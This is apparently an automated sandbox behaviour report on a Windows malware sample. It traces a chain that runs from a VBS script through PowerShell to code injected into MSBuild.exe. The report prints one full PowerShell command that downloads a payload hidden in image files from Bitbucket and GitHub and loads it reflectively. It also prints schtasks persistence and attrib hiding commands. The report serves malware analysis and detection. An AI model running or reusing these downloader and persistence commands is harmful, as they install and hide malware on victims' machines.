                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33737Jump to behavior
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData
                  Source: C:\Windows\System32\conhost.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                  Source: ModuleAnalysisCache.6.dr Binary or memory string: Remove-NetEventVmNetworkAdapter
                  Source: wscript.exe, 00000003.00000003.1661779222.000002A83E968000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\/
                  Source: ModuleAnalysisCache.6.dr Binary or memory string: Add-NetEventVmNetworkAdapter
                  Source: MSBuild.exe, 00000008.00000002.4140277158.00000000067C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllL_
                  Source: ModuleAnalysisCache.6.dr Binary or memory string: Get-NetEventVmNetworkAdapter
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F71D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF761F71D28
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F78494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF761F78494
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F78790 SetUnhandledExceptionFilter,0_2_00007FF761F78790
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match File source: amsi64_8000.amsi.csv, type: OTHER
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 7840, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: powershell.exe PID: 8000, type: MEMORYSTR
                  Source: 6.2.powershell.exe.1d3bba895c8.2.raw.unpack, Options.cs Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, (uint)array.Length, 12288u, 64u)
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
                  Source: 6.2.powershell.exe.1d3bb47be40.1.raw.unpack, Progrgdfam3.cs Reference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
                  Source: windows media player.exe.8.dr, NativeMethodsShared.cs Reference to suspicious API methods: OpenProcess(eDesiredAccess.PROCESS_QUERY_INFORMATION, bInheritHandle: false, processIdTokill)
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 40E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 410000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: EED008
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '[encoded payload omitted]
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Users\user\Desktop\3lhrJ4X.exe Code function: 0_2_00007FF761F711CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF761F711CC
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
